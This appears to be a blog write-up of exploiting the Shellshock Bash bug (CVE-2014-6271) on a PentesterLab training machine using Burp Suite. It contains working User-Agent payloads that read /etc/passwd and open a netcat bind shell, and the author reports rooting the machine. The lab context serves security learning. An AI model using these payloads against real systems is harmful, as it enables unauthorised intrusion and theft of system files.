How to Exploit the ShellShock/Bash Bug CVE-2014-6271 Vulnerability

The "Shellshock" or "Bash Bug" vulnerability was discovered on September 24, 2014. This vulnerability was assigned the CVE classifer CVE-2014-6271. According to NIST, "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution" (https://nvd.nist.gov/vuln/detail/CVE-2014-6271).


To exploit this vulnerability, I used an infected virtual machine installed on a Hyper-V instance. The machine itself was downloaded from a lab in PentesterLab (https://pentesterlab.com). I also used a virtualized image of Kali Linux (see image below for version and OS details). Additional tools used were Burp Suite (which comes pre-installed on Kali, and the FoxyProxy addon module for FireFox (https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard).


Once the vulnerable machine was installed on Hyper-V, my first step was to assign it a static IP address using the command sudo ifconfig eth0 192.168.1.5 netmask 255.255.255.0
To ensure the static IP was set, use the command ifconfig  


I followed this by opening Burp Suite in Kali and bound the proxy listener to loopback only (127.0.0.1) and to listen on port 8181. Additionally, I disabled the interceptor as it was not needed to perform this exploit.
The next thing I did was setup FoxyProxy in the web browser with the local host address and port 8181. I named this proxy 'Adam's Proxy'. Once it was configured, I enabled all traffic to be routed through the proxy.
Next, I opened the Firefox web browser in my Kali instance and navigated to the vulnerable machine.
Since  ShellShock/Bash Bug CVE-2014-6271 uses the CGI as the attack vector for this vulnerability, I sent this to the repeater to start manipulating parameters to see how I can begin exploiting the vulnerability.


To test for the ShellShock/Bash Bug CVE-2014-6271, I changed the User-Agent field to run the command ( ) { :;}; echo $(</etc/passwd) which returned the information in the passwd file.


I decided it would be much more interesting to open a shell to execute commands on the vulnerable machine. To do this, I changed the User-Agent to run the following command: ( ) { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
This command listens on the local machine over port 9999 for any connections.
As you can see, there were no errors returned. Next, I opened a netcat session on my local machine to listen to port 9999 on the vulnerable box. From here, I was able to execute commands and root the machine.
Next, I wanted to see if I could create a reverse shell. Since most machines in the wild will have some sort of firewall that block attackers from access over random ports, I am going to connect over known open posts used for web servers (80, 443).

Comments

Popular posts from this blog

Master Port List

Installing and Configuring WebGoat

Reflected Cross Site Scripting (XSS) Attacks